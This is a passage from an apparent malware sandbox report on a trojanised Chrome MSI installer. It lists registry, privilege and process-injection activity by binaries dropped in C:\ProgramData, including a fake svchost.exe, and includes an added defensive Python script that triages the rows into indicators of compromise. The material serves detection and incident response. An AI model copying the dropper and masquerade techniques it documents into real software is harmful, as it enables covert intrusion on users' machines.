Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{909489C2-85A6-4322-AA56-D25278649D67}\ = "IGoogleUpdateCore" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F63F6F8B-ACD5-413C-A44B-0409136D26CB}\NumMethods\ = "16" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4DE778FE-F195-4EE3-9DAB-FE446C239221}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DCAB8386-4F03-4DBD-A366-D90BC9F68DE6} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{ABC01078-F197-4B0B-ADBC-CFE684B39C82}\VERSIONINDEPENDENTPROGID C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{ADDF22CF-3E9B-4CD7-9139-8169EA6636E4}\Elevation C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1C4CDEFF-756A-4804-9E77-3E8EB9361016}\ProgID C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32 C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6DB17455-4E85-46E7-9D23-E555E4B005AF}\NumMethods C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8476CE12-AE1F-4198-805C-BA0F9B783F57}\NumMethods\ = "11" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\ChromePDF\shell\open\command C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\.html C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{19692F10-ADD2-4EFF-BE54-E61C62E40D13}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DD42475D-6D46-496A-924E-BD5630B4CBBA}\ = "IAppBundleWeb" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{521FDB42-7130-4806-822A-FC5163FAD983}\Elevation\Enabled = "1" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{ADDF22CF-3E9B-4CD7-9139-8169EA6636E4}\PROGID C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{ABC01078-F197-4B0B-ADBC-CFE684B39C82}\ProgID C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25461599-633D-42B1-84FB-7CD68D026E53}\ProgID\ = "GoogleUpdate.CredentialDialogMachine.1.0" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6DB17455-4E85-46E7-9D23-E555E4B005AF}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Smart\setup.exe N/A
N/A N/A C:\ProgramData\Smart\setup.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Packas\scrok.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\srtasks.exe N/A
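The tables in this report mix two very different populations of processes: the legitimate Chrome/Google Update install chain (GoogleUpdate.exe, GoogleUpdateComRegisterShell64.exe, chrome.exe, msiexec.exe, vssvc.exe, srtasks.exe) and the binaries the MSI staged under C:\ProgramData (Smart\setup.exe, Smart\TjNkNpAilaYvt.exe, Packas\scrok.exe, NVIDIARV\svchost.exe). The privilege table above illustrates why the privilege name alone is a poor filter: msiexec.exe enabling a long list of privileges and vssvc.exe/srtasks.exe taking SeBackup/SeRestore is ordinary Windows Installer and System Restore behaviour, whereas SeDebugPrivilege from scrok.exe and TjNkNpAilaYvt.exe is the signal. The script below is an added triage example written for this page, not code from the sandbox vendor or from the report. It parses rows in the flattened "Description Indicator Process Target" layout used throughout the report (copied verbatim from the HKEY_USERS, registry-class, privilege-token and process tables above) and applies three assumptions of mine: that C:\ProgramData, C:\Users and C:\Windows\Temp are user-writable staging locations, that a binary named like a system executable (svchost.exe, msiexec.exe, ...) outside system32/SysWOW64 is a masquerade, and that a COM InprocServer32/LocalServer32 path pointing into a staging directory is a hijack candidate. It also pulls out the Group = "Fatal" / InstallTime values the dropped svchost.exe wrote under HKU\.DEFAULT\System\CurrentControlSet\Services, which is the host-side artifact a responder would look for.

```python
"""Triage of flattened sandbox signature rows ('<description> <indicator> <process> <target>').

Added example for this report; not the sandbox vendor's code. ROWS are copied from the
tables above. The staging-directory, name-masquerade and COM-server rules are the
author's assumptions, not signatures the sandbox itself emitted.
"""
import re

ROWS = [
    # Modifies data under HKEY_USERS
    r'Set value (str) \REGISTRY\USER\.DEFAULT\System\CurrentControlSet\Services\Group = "Fatal" C:\ProgramData\NVIDIARV\svchost.exe N/A',
    r'Set value (str) \REGISTRY\USER\.DEFAULT\System\CurrentControlSet\Services\InstallTime = "2025-02-21 23:08" C:\ProgramData\NVIDIARV\svchost.exe N/A',
    r'Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 C:\Windows\system32\msiexec.exe N/A',
    # Modifies registry class
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.312\\psmachine_64.dll" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A',
    # Suspicious use of AdjustPrivilegeToken
    r'Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A',
    r'Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A',
    r'Token: SeDebugPrivilege N/A C:\ProgramData\Packas\scrok.exe N/A',
    r'Token: SeDebugPrivilege N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A',
    # Process-only rows (Executes dropped EXE / EnumeratesProcesses)
    r'N/A N/A C:\ProgramData\Smart\setup.exe N/A',
    r'N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A',
    r'N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A',
]

# process = first drive-letter path that follows a space and is not inside a quoted value;
# target = the trailing cell, either 'N/A' or another path.
ROW_RE = re.compile(r'^(?P<desc>.*?) (?P<process>[A-Za-z]:\\[^"]*?) (?P<target>N/A|[A-Za-z]:\\.*)$')

# Assumed user-writable staging locations (ProgramData lets any user create subfolders).
STAGING_PREFIXES = ('c:\\programdata\\', 'c:\\users\\', 'c:\\windows\\temp\\')
SYSTEM_DIRS = ('c:\\windows\\system32\\', 'c:\\windows\\syswow64\\')
# Binary names that only belong in the Windows system directories.
SYSTEM_ONLY_NAMES = {'svchost.exe', 'msiexec.exe', 'vssvc.exe', 'srtasks.exe', 'cmd.exe', 'timeout.exe'}
SERVICES_KEY = '\\registry\\user\\.default\\system\\currentcontrolset\\services\\'


def in_staging_dir(path):
    return path.lower().startswith(STAGING_PREFIXES)


def masquerades_system_binary(path):
    low = path.lower()
    return low.rsplit('\\', 1)[-1] in SYSTEM_ONLY_NAMES and not low.startswith(SYSTEM_DIRS)


def parse_row(row):
    """Return {'action', 'indicator', 'process', 'target'} or None for an unparseable row."""
    m = ROW_RE.match(row)
    if not m:
        return None
    desc, process, target = m.group('desc', 'process', 'target')
    rec = {'action': None, 'indicator': None, 'process': process, 'target': target}
    if desc.startswith('Token: '):
        rec['action'], rec['indicator'] = 'AdjustPrivilegeToken', desc.split()[1]
    elif ' \\REGISTRY\\' in desc:
        action, _, key = desc.partition(' \\REGISTRY\\')
        rec['action'], rec['indicator'] = action, '\\REGISTRY\\' + key
    elif desc != 'N/A N/A':
        rec['action'] = desc
    return rec


def registry_value(indicator):
    """Split 'key\\name = "value"' into (key_path, value); (indicator, None) if no value."""
    key, sep, val = indicator.partition(' = ')
    return (key, val.strip('"')) if sep else (indicator, None)


def triage(rows):
    report = {'staging_processes': set(), 'masquerading': set(),
              'sedebug_from_staging': set(), 'rat_service_marker': {},
              'com_servers_in_staging': []}
    for rec in filter(None, map(parse_row, rows)):
        proc = rec['process']
        if in_staging_dir(proc):
            report['staging_processes'].add(proc)
        if masquerades_system_binary(proc):
            report['masquerading'].add(proc)
        if rec['action'] == 'AdjustPrivilegeToken':
            # Key on where the process lives, not on the privilege name: msiexec.exe
            # and vssvc.exe legitimately enable these privileges during an install.
            if rec['indicator'] == 'SeDebugPrivilege' and in_staging_dir(proc):
                report['sedebug_from_staging'].add(proc)
            continue
        if rec['indicator'] is None:
            continue
        key, value = registry_value(rec['indicator'])
        low = key.lower()
        # The dropped svchost.exe stamps Group/InstallTime under HKU\.DEFAULT\...\Services;
        # any such write from a staging directory is recorded as a RAT install marker.
        if low.startswith(SERVICES_KEY) and value is not None and in_staging_dir(proc):
            report['rat_service_marker'][key.rsplit('\\', 1)[-1]] = value
        # A COM server registered from a user-writable directory is a hijack candidate.
        if low.rstrip('\\').endswith(('inprocserver32', 'localserver32')) and value:
            server = value.replace('\\\\', '\\')  # report stores the value with doubled backslashes
            if in_staging_dir(server):
                report['com_servers_in_staging'].append((key, server))
    return report


if __name__ == '__main__':
    for name, hits in triage(ROWS).items():
        print(f'{name}: {sorted(hits) if isinstance(hits, set) else hits}')
```

Run against the rows above, the script isolates the four ProgramData binaries, flags NVIDIARV\svchost.exe as a system-name masquerade, attributes SeDebugPrivilege only to scrok.exe and TjNkNpAilaYvt.exe, recovers the Group = "Fatal" and InstallTime marker, and leaves the GoogleUpdate psmachine_64.dll COM registration unflagged because it resolves into Program Files (x86). To hunt on an endpoint, the same marker translates directly into a registry query for HKU\.DEFAULT\System\CurrentControlSet\Services\Group.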

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\ProgramData\Smart\setup.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3884 wrote to memory of 2016 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\srtasks.exe
PID 3884 wrote to memory of 2016 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\srtasks.exe
PID 3884 wrote to memory of 3804 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3884 wrote to memory of 3804 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3884 wrote to memory of 3804 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3804 wrote to memory of 4468 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\cmd.exe
PID 3804 wrote to memory of 4468 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\cmd.exe
PID 3804 wrote to memory of 4468 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\cmd.exe
PID 4468 wrote to memory of 4488 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4468 wrote to memory of 4488 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4468 wrote to memory of 4488 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4468 wrote to memory of 1528 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\aa.exe
PID 4468 wrote to memory of 1528 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\aa.exe
PID 4468 wrote to memory of 1528 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\aa.exe
PID 4468 wrote to memory of 1744 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Packas\scrok.exe
PID 4468 wrote to memory of 1744 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Packas\scrok.exe
PID 1744 wrote to memory of 820 N/A C:\ProgramData\Packas\scrok.exe C:\Windows\system32\svchost.exe
PID 1744 wrote to memory of 820 N/A C:\ProgramData\Packas\scrok.exe C:\Windows\system32\svchost.exe
PID 1744 wrote to memory of 820 N/A C:\ProgramData\Packas\scrok.exe C:\Windows\system32\svchost.exe
PID 4468 wrote to memory of 1972 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 4468 wrote to memory of 1972 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 4468 wrote to memory of 3040 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 4468 wrote to memory of 3040 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 4468 wrote to memory of 5016 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4468 wrote to memory of 5016 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4468 wrote to memory of 5016 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4468 wrote to memory of 104 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 4468 wrote to memory of 104 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 4468 wrote to memory of 4776 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Packas\scrok.exe
PID 4468 wrote to memory of 4776 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Packas\scrok.exe
PID 4968 wrote to memory of 3780 N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe C:\ProgramData\Smart\setup.exe
PID 4968 wrote to memory of 3780 N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe C:\ProgramData\Smart\setup.exe
PID 4968 wrote to memory of 3780 N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe C:\ProgramData\Smart\setup.exe
PID 4776 wrote to memory of 820 N/A C:\ProgramData\Packas\scrok.exe C:\Windows\system32\svchost.exe
PID 4776 wrote to memory of 820 N/A C:\ProgramData\Packas\scrok.exe C:\Windows\system32\svchost.exe
PID 4776 wrote to memory of 820 N/A C:\ProgramData\Packas\scrok.exe C:\Windows\system32\svchost.exe
PID 4468 wrote to memory of 1668 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\setup.exe
PID 4468 wrote to memory of 1668 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\setup.exe
PID 4468 wrote to memory of 1668 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\setup.exe
PID 3780 wrote to memory of 4680 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 3780 wrote to memory of 4680 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 3780 wrote to memory of 4680 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 3780 wrote to memory of 416 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 3780 wrote to memory of 416 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 3780 wrote to memory of 416 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 3780 wrote to memory of 1388 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 3780 wrote to memory of 1388 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 3780 wrote to memory of 1388 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 1668 wrote to memory of 4928 N/A C:\ProgramData\setup\setup.exe C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe
PID 1668 wrote to memory of 4928 N/A C:\ProgramData\setup\setup.exe C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe
PID 1668 wrote to memory of 4928 N/A C:\ProgramData\setup\setup.exe C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe
PID 4928 wrote to memory of 5020 N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
PID 4928 wrote to memory of 5020 N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
PID 4928 wrote to memory of 5020 N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
PID 4928 wrote to memory of 3716 N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
PID 4928 wrote to memory of 3716 N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
PID 4928 wrote to memory of 3716 N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
PID 3716 wrote to memory of 3064 N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
PID 3716 wrote to memory of 3064 N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
PID 3716 wrote to memory of 4052 N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
PID 3716 wrote to memory of 4052 N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
PID 3716 wrote to memory of 4860 N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
PID 3716 wrote to memory of 4860 N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
PID 4928 wrote to memory of 4868 N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Chrome.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\vssvc.exe

